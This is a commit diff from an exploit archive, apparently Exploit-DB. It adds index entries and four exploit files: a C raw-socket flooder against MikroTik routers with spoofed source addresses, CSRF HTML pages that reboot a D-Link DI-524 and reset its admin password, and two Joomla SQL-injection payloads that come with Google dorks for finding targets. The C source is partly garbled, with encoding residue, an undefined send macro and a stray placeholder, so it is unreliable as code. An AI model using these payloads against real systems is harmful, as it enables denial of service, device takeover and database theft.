DB: 2017-03-15
4 new exploits MikroTik Router - ARP Table OverFlow Denial Of Service Netgear R7000 and R6400 - cgi-bin Command Injection (Metasploit) Netgear R7000 and R6400 - 'cgi-bin' Command Injection (Metasploit) D-Link DI-524 - Cross-Site Request Forgery Joomla! Component Simple Membership 3.3.3 - 'userId' Parameter SQL Injection Joomla! Component Advertisement Board 3.0.4 - 'id' Parameter SQL Injection
This commit is contained in:
parent
8359f0a6a2
commit
c7382d10cd
5 changed files with 474 additions and 1 deletions
|
@ -5390,6 +5390,7 @@ id,file,description,date,author,platform,type,port
|
|||
41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0
|
||||
41565,platforms/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos,0
|
||||
41596,platforms/windows/dos/41596.py,"Cerberus FTP Server 8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",windows,dos,0
|
||||
41601,platforms/hardware/dos/41601.c,"MikroTik Router - ARP Table OverFlow Denial Of Service",2017-03-05,FarazPajohan,hardware,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -15316,7 +15317,7 @@ id,file,description,date,author,platform,type,port
|
|||
41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
|
||||
41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
|
||||
41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0
|
||||
41598,platforms/cgi/remote/41598.rb,"Netgear R7000 and R6400 - cgi-bin Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80
|
||||
41598,platforms/cgi/remote/41598.rb,"Netgear R7000 and R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -37072,6 +37073,7 @@ id,file,description,date,author,platform,type,port
|
|||
40978,platforms/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,hardware,webapps,0
|
||||
40979,platforms/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps,0
|
||||
40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0
|
||||
40983,platforms/hardware/webapps/40983.html,"D-Link DI-524 - Cross-Site Request Forgery",2016-12-09,"Felipe Soares de Souza",hardware,webapps,0
|
||||
40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0
|
||||
40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
|
||||
40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
|
||||
|
@ -37512,3 +37514,5 @@ id,file,description,date,author,platform,type,port
|
|||
41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41591,platforms/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41594,platforms/php/webapps/41594.txt,"Fiyo CMS 2.0.6.1 - Privilege Escalation",2017-03-11,rungga_reksya,php,webapps,0
|
||||
41599,platforms/php/webapps/41599.txt,"Joomla! Component Simple Membership 3.3.3 - 'userId' Parameter SQL Injection",2017-03-14,"Ihsan Sencan",php,webapps,0
|
||||
41600,platforms/php/webapps/41600.txt,"Joomla! Component Advertisement Board 3.0.4 - 'id' Parameter SQL Injection",2017-03-14,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
395
platforms/hardware/dos/41601.c
Executable file
395
platforms/hardware/dos/41601.c
Executable file
|
@ -0,0 +1,395 @@
|
|||
#Exploit Title: MikroTik Router Denial Of Service | ARP Table OverFlow
|
||||
#Exploit Author: Hosein Askari (FarazPajohan)
|
||||
#Vendor HomePage: https://mikrotik.com/
|
||||
#Affected Series: Hap Lite
|
||||
#Version: 6.25
|
||||
#Tested on: Parrot Security OS
|
||||
#Date: 04-3-2017
|
||||
#Category: Network Appliance
|
||||
#Vulnerable Part: TCP Stack
|
||||
#Author Mail :hosein.askari@aol.com
|
||||
#Reference: https://cxsecurity.com/issue/WLB-2017030029
|
||||
#CVE:2017-6444
|
||||
|
||||
#Description:
|
||||
#The MikroTik Router has not protection mechanism for the case of a fast network connection which allows remote attackers to cause a denial of service (CPU consumption) by #sending many #TCP ACK packets. after the attacker stops the exploit , the CPU usage is 100% and the router should be reboot again for working normally.
|
||||
|
||||
#################
|
||||
#Exploit Command :
|
||||
# ~~~#exploit.out -T0 -h <MikroTik_ip> -p [23,23]
|
||||
################
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <netdb.h>
|
||||
#include <sys/types.h>
|
||||
#ifdef F_PASS
|
||||
#include <sys/stat.h>
|
||||
#endif
|
||||
#include <netinet/in_systm.h>
|
||||
#include <sys/socket.h>
|
||||
#include <string.h>
|
||||
#include <time.h>
|
||||
#ifndef __USE_BSD
|
||||
# define __USE_BSD
|
||||
#endif
|
||||
#ifndef __FAVOR_BSD
|
||||
# define __FAVOR_BSD
|
||||
#endif
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <netinet/ip_icmp.h>
|
||||
#include <arpa/inet.h>
|
||||
#ifdef LINUX
|
||||
# define FIX(x) htons(x)
|
||||
#else
|
||||
# define FIX(x) (x)
|
||||
#endif
|
||||
#define TCP_ACK 1
|
||||
#define TCP_FIN 2
|
||||
#define TCP_SYN 4
|
||||
#define TCP_RST 8
|
||||
#define UDP_CFF 16
|
||||
#define ICMP_ECHO_G 32
|
||||
#define TCP_NOF 64
|
||||
#define TCP_URG 128
|
||||
#define TH_NOF 0x0
|
||||
#define TCP_ATTACK() (a_flags & TCP_ACK ||\
|
||||
a_flags & TCP_FIN ||\
|
||||
a_flags & TCP_SYN ||\
|
||||
a_flags & TCP_RST ||\
|
||||
a_flags & TCP_NOF ||\
|
||||
a_flags & TCP_URG )
|
||||
#define UDP_ATTACK() (a_flags & UDP_CFF)
|
||||
#define ICMP_ATTACK() (a_flags & ICMP_ECHO_G)
|
||||
#define CHOOSE_DST_PORT() dst_sp =3D=3D 0 ?\
|
||||
random () :\
|
||||
htons(dst_sp + (random() % (dst_ep -dst_sp +1)));
|
||||
#define CHOOSE_SRC_PORT() src_sp =3D=3D 0 ?\
|
||||
random () :\
|
||||
htons(src_sp + (random() % (src_ep -src_sp +1)));
|
||||
#define KET() if (sendto(rawsock,\
|
||||
&packet,\
|
||||
(sizeof packet),\
|
||||
0,\
|
||||
(struct sockaddr *)&target,\
|
||||
sizeof target) < 0) {\
|
||||
perror("sendto");\
|
||||
exit(-1);\
|
||||
}
|
||||
#define BANNER_CKSUM 54018
|
||||
u_long lookup(const char *host);
|
||||
unsigned short in_cksum(unsigned short *addr, int len);
|
||||
static void inject_iphdr(struct ip *ip, u_char p, u_char len);
|
||||
char *class2ip(const char *class);
|
||||
static void send_tcp(u_char th_flags);
|
||||
static void send_udp(u_char garbage);
|
||||
static void send_icmp(u_char garbage);
|
||||
char *get_plain(const char *crypt_file, const char *xor_data_key);
|
||||
static void usage(const char *argv0);
|
||||
u_long dstaddr;
|
||||
u_short dst_sp, dst_ep, src_sp, src_ep;
|
||||
char *src_class, *dst_class;
|
||||
int a_flags, rawsock;
|
||||
struct sockaddr_in target;
|
||||
const char *banner =3D "Written By C0NSTANTINE";
|
||||
struct pseudo_hdr {
|
||||
u_long saddr, daddr;
|
||||
u_char mbz, ptcl;
|
||||
u_short tcpl;
|
||||
};
|
||||
struct cksum {
|
||||
struct pseudo_hdr pseudo;
|
||||
struct tcphdr tcp;
|
||||
};
|
||||
struct {
|
||||
int gv;
|
||||
int kv;
|
||||
void (*f)(u_char);
|
||||
} a_list[] =3D {
|
||||
{ TCP_ACK, TH_ACK, send_tcp },
|
||||
{ TCP_FIN, TH_FIN, send_tcp },
|
||||
{ TCP_SYN, TH_SYN, send_tcp },
|
||||
{ TCP_RST, TH_RST, send_tcp },
|
||||
{ TCP_NOF, TH_NOF, send_tcp },
|
||||
{ TCP_URG, TH_URG, send_tcp },
|
||||
{ UDP_CFF, 0, send_udp },
|
||||
{ ICMP_ECHO_G, ICMP_ECHO, send_icmp },
|
||||
{ 0, 0, (void *)NULL },
|
||||
};
|
||||
int
|
||||
main(int argc, char *argv[])
|
||||
{
|
||||
int n, i, on =3D 1;
|
||||
int b_link;
|
||||
#ifdef F_PASS
|
||||
struct stat sb;
|
||||
#endif
|
||||
unsigned int until;
|
||||
a_flags =3D dstaddr =3D i =3D 0;
|
||||
dst_sp =3D dst_ep =3D src_sp =3D src_ep =3D 0;
|
||||
until =3D b_link =3D -1;
|
||||
src_class =3D dst_class =3D NULL;
|
||||
while ( (n =3D getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) !=3D -1) {
|
||||
char *p;
|
||||
switch (n) {
|
||||
case 'T':
|
||||
switch (atoi(optarg)) {
|
||||
case 0: a_flags |=3D TCP_ACK; break;
|
||||
case 1: a_flags |=3D TCP_FIN; break;
|
||||
case 2: a_flags |=3D TCP_RST; break;
|
||||
case 3: a_flags |=3D TCP_SYN; break;
|
||||
|
||||
case 4: a_flags |=3D TCP_URG; break;
|
||||
|
||||
|
||||
}
|
||||
break;
|
||||
case 'U':
|
||||
a_flags |=3D UDP_CFF;
|
||||
break;
|
||||
case 'I':
|
||||
a_flags |=3D ICMP_ECHO_G;
|
||||
break;
|
||||
case 'N':
|
||||
a_flags |=3D TCP_NOF;
|
||||
break;
|
||||
case 's':
|
||||
src_class =3D optarg;
|
||||
break;
|
||||
case 'h':
|
||||
dstaddr =3D lookup(optarg);
|
||||
break;
|
||||
case 'd':
|
||||
dst_class =3D optarg;
|
||||
i =3D 1;
|
||||
break;
|
||||
case 'p':
|
||||
if ( (p =3D (char *) strchr(optarg, ',')) =3D=3D NULL)
|
||||
usage(argv[0]);
|
||||
dst_sp =3D atoi(optarg);
|
||||
dst_ep =3D atoi(p +1);
|
||||
break;
|
||||
case 'q':
|
||||
if ( (p =3D (char *) strchr(optarg, ',')) =3D=3D NULL)
|
||||
usage(argv[0]);
|
||||
src_sp =3D atoi(optarg);
|
||||
src_ep =3D atoi(p +1);
|
||||
break;
|
||||
case 'l':
|
||||
b_link =3D atoi(optarg);
|
||||
if (b_link <=3D 0 || b_link > 100)
|
||||
usage(argv[0]);
|
||||
break;
|
||||
case 't':
|
||||
until =3D time(0) +atoi(optarg);
|
||||
break;
|
||||
default:
|
||||
usage(argv[0]);
|
||||
break;
|
||||
}
|
||||
}
|
||||
if ( (!dstaddr && !i) ||
|
||||
(dstaddr && i) ||
|
||||
(!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) ||
|
||||
(src_sp !=3D 0 && src_sp > src_ep) ||
|
||||
(dst_sp !=3D 0 && dst_sp > dst_ep))
|
||||
usage(argv[0]);
|
||||
srandom(time(NULL) ^ getpid());
|
||||
if ( (rawsock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
|
||||
perror("socket");
|
||||
exit(-1);
|
||||
}
|
||||
if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL,
|
||||
(char *)&on, sizeof(on)) < 0) {
|
||||
perror("setsockopt");
|
||||
exit(-1);
|
||||
}
|
||||
target.sin_family =3D AF_INET;
|
||||
for (n =3D 0; ; ) {
|
||||
if (b_link !=3D -1 && random() % 100 +1 > b_link) {
|
||||
if (random() % 200 +1 > 199)
|
||||
usleep(1);
|
||||
continue;
|
||||
}
|
||||
for (i =3D 0; a_list[i].f !=3D NULL; ++i) {
|
||||
if (a_list[i].gv & a_flags)
|
||||
a_list[i].f(a_list[i].kv);
|
||||
}
|
||||
if (n++ =3D=3D 100) {
|
||||
if (until !=3D -1 && time(0) >=3D until) break;
|
||||
n =3D 0;
|
||||
}
|
||||
}
|
||||
exit(0);
|
||||
}
|
||||
u_long
|
||||
lookup(const char *host)
|
||||
{
|
||||
struct hostent *hp;
|
||||
|
||||
if ( (hp =3D gethostbyname(host)) =3D=3D NULL) {
|
||||
perror("gethostbyname");
|
||||
exit(-1);
|
||||
}
|
||||
return *(u_long *)hp->h_addr;
|
||||
}
|
||||
#define RANDOM() (int) random() % 255 +1
|
||||
char *
|
||||
class2ip(const char *class)
|
||||
{
|
||||
static char ip[16];
|
||||
int i, j;
|
||||
|
||||
for (i =3D 0, j =3D 0; class[i] !=3D '{TEXTO}'; ++i)
|
||||
if (class[i] =3D=3D '.')
|
||||
++j;
|
||||
switch (j) {
|
||||
case 0:
|
||||
sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
|
||||
break;
|
||||
case 1:
|
||||
sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
|
||||
break;
|
||||
case 2:
|
||||
sprintf(ip, "%s.%d", class, RANDOM());
|
||||
break;
|
||||
default: strncpy(ip, class, 16);
|
||||
break;
|
||||
}
|
||||
return ip;
|
||||
}
|
||||
unsigned short
|
||||
in_cksum(unsigned short *addr, int len)
|
||||
{
|
||||
int nleft =3D len;
|
||||
int sum =3D 0;
|
||||
unsigned short *w =3D addr;
|
||||
unsigned short answer =3D 0;
|
||||
while (nleft > 1) {
|
||||
sum +=3D *w++;
|
||||
nleft -=3D 2;
|
||||
}
|
||||
if (nleft =3D=3D 1) {
|
||||
*(unsigned char *) (&answer) =3D *(unsigned char *)w;
|
||||
sum +=3D answer;
|
||||
}
|
||||
sum =3D (sum >> 16) + (sum & 0xffff);
|
||||
sum +=3D (sum >> 16);
|
||||
answer =3D ~sum;
|
||||
return answer;
|
||||
}
|
||||
static void
|
||||
inject_iphdr(struct ip *ip, u_char p, u_char len)
|
||||
{
|
||||
ip->ip_hl =3D 5;
|
||||
ip->ip_v =3D 4;
|
||||
ip->ip_p =3D p;
|
||||
ip->ip_tos =3D 0x08; /* 0x08 */
|
||||
ip->ip_id =3D random();
|
||||
ip->ip_len =3D len;
|
||||
ip->ip_off =3D 0;
|
||||
ip->ip_ttl =3D 255;
|
||||
ip->ip_dst.s_addr =3D dst_class !=3D NULL ?
|
||||
inet_addr(class2ip(dst_class)) :
|
||||
dstaddr;
|
||||
ip->ip_src.s_addr =3D src_class !=3D NULL ?
|
||||
inet_addr(class2ip(src_class)) :
|
||||
random();
|
||||
target.sin_addr.s_addr =3D ip->ip_dst.s_addr;
|
||||
}
|
||||
static void
|
||||
send_tcp(u_char th_flags)
|
||||
{
|
||||
struct cksum cksum;
|
||||
struct packet {
|
||||
struct ip ip;
|
||||
struct tcphdr tcp;
|
||||
} packet;
|
||||
memset(&packet, 0, sizeof packet);
|
||||
inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet));
|
||||
packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
|
||||
cksum.pseudo.daddr =3D dstaddr;
|
||||
cksum.pseudo.mbz =3D 0;
|
||||
cksum.pseudo.ptcl =3D IPPROTO_TCP;
|
||||
cksum.pseudo.tcpl =3D htons(sizeof(struct tcphdr));
|
||||
cksum.pseudo.saddr =3D packet.ip.ip_src.s_addr;
|
||||
packet.tcp.th_flags =3D random();
|
||||
packet.tcp.th_win =3D random();
|
||||
packet.tcp.th_seq =3D random();
|
||||
packet.tcp.th_ack =3D random();
|
||||
packet.tcp.th_off =3D 5;
|
||||
packet.tcp.th_urp =3D 0;
|
||||
packet.tcp.th_sport =3D CHOOSE_SRC_PORT();
|
||||
packet.tcp.th_dport =3D CHOOSE_DST_PORT();
|
||||
cksum.tcp =3D packet.tcp;
|
||||
packet.tcp.th_sum =3D in_cksum((void *)&cksum, sizeof(cksum));
|
||||
SEND_PACKET();
|
||||
}
|
||||
static void
|
||||
send_udp(u_char garbage)
|
||||
{
|
||||
struct packet {
|
||||
struct ip ip;
|
||||
struct udphdr udp;
|
||||
} packet;
|
||||
memset(&packet, 0, sizeof packet);
|
||||
inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
|
||||
packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
|
||||
packet.udp.uh_sport =3D CHOOSE_SRC_PORT();
|
||||
packet.udp.uh_dport =3D CHOOSE_DST_PORT();
|
||||
packet.udp.uh_ulen =3D htons(sizeof packet.udp);
|
||||
packet.udp.uh_sum =3D 0;
|
||||
SEND_PACKET();
|
||||
}
|
||||
static void
|
||||
send_icmp(u_char gargabe)
|
||||
{
|
||||
struct packet {
|
||||
struct ip ip;
|
||||
struct icmp icmp;
|
||||
} packet;
|
||||
memset(&packet, 0, sizeof packet);
|
||||
inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet));
|
||||
packet.ip.ip_sum =3D in_cksum((void *)&packet.ip, 20);
|
||||
packet.icmp.icmp_type =3D ICMP_ECHO;
|
||||
packet.icmp.icmp_code =3D 0;
|
||||
packet.icmp.icmp_cksum =3D htons( ~(ICMP_ECHO << 8));
|
||||
for(int pp=3D0;pp<=3D1000;pp++)
|
||||
{SEND_PACKET();
|
||||
pp++;
|
||||
}
|
||||
}
|
||||
static void
|
||||
usage(const char *argv0)
|
||||
{
|
||||
printf("%s \n", banner);
|
||||
printf(" -U UDP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\=
|
||||
n");
|
||||
printf(" -I ICMP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m=
|
||||
\n");
|
||||
printf(" -N Bogus attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0=
|
||||
m\n");
|
||||
printf(" -T TCP attack \e[1;37m[\e[0m0:ACK, 1:FIN, 2:RST, 3:SYN, 4:URG\e[1;=
|
||||
37m]\e[0m\n");
|
||||
printf(" -h destination host/ip \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;3=
|
||||
7m)\e[0m\n");
|
||||
printf(" -d destination class \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[=
|
||||
0m\n");
|
||||
printf(" -s source class/ip \e[1;37m(\e[m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\=
|
||||
n");
|
||||
printf(" -p destination port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom=
|
||||
\e[0m\e[1;37m)\e[0m\n");
|
||||
printf(" -q source port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m=
|
||||
\e[1;37m)\e[0m\n");
|
||||
printf(" -l pps limiter \e[1;37m(\e[0m\e[0;31mno limit\e[0m\e[1;37m)\e[0m\n=
|
||||
");
|
||||
printf(" -t timeout \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n")=
|
||||
;
|
||||
printf("\e[1musage\e[0m: %s [-T0 -T1 -T2 -T3 -T4 -U -I -h -p -t]\n", argv0)=
|
||||
;
|
||||
exit(-1);
|
||||
}
|
38
platforms/hardware/webapps/40983.html
Executable file
38
platforms/hardware/webapps/40983.html
Executable file
|
@ -0,0 +1,38 @@
|
|||
Title: D-Link DI-524 - Cross-Site-Request-Forgery Vulnerability
|
||||
Credit: Felipe Soares de Souza
|
||||
Date: 09/12/2016
|
||||
Vendor: D-Link
|
||||
Product: D-Link DI-524 Wireless 150
|
||||
Product link: https://dlink.com.br/produto/di-524150
|
||||
Version: Firmware 9.01
|
||||
|
||||
|
||||
1- Reboot the device
|
||||
<html>
|
||||
<head>
|
||||
<title>CSRF - Reboot the device</title>
|
||||
</head>
|
||||
<body>
|
||||
<iframe width="1" height="1" src="http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
2- Change admin account
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>CSRF - Change admin account</title>
|
||||
</head>
|
||||
<body>
|
||||
<form method="POST" action="http://192.168.1.1/cgi-bin/pass">
|
||||
<input type="hidden" name="rc" value="@atbox">
|
||||
<input type="hidden" name="Pa" value="attacker">
|
||||
<input type="hidden" name="p1" value="attacker">
|
||||
</form>
|
||||
|
||||
<script type="text/javascript">
|
||||
document.forms[0].submit();
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
18
platforms/php/webapps/41599.txt
Executable file
18
platforms/php/webapps/41599.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Simple Membership v3.3.3 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_simplemembership
|
||||
# Date: 14.03.2017
|
||||
# Vendor Homepage: http://ordasoft.com/
|
||||
# Software : https://extensions.joomla.org/extensions/extension/e-commerce/membership-a-subscriptions/simplemembership/
|
||||
# Demo: http://ordasvit.com/simplemembership/
|
||||
# Version: 3.3.3
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_simplemembership&Itemid=1&task=showUsersProfile&userId=[SQL]
|
||||
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,database())),0)--+-
|
||||
# # # # #
|
18
platforms/php/webapps/41600.txt
Executable file
18
platforms/php/webapps/41600.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Advertisement Board v3.0.4 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_advertisementboard
|
||||
# Date: 14.03.2017
|
||||
# Vendor Homepage: http://ordasoft.com/
|
||||
# Software : https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/advertisement-board/
|
||||
# Demo: http://ordasvit.com/joomla-adboard/
|
||||
# Version: 3.0.4
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php/153/show_alone_advertisement/7?task=show_alone_advertisement&id=[SQL]
|
||||
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,database())),0)--+-
|
||||
# # # # #
|
Loading…
Add table
Reference in a new issue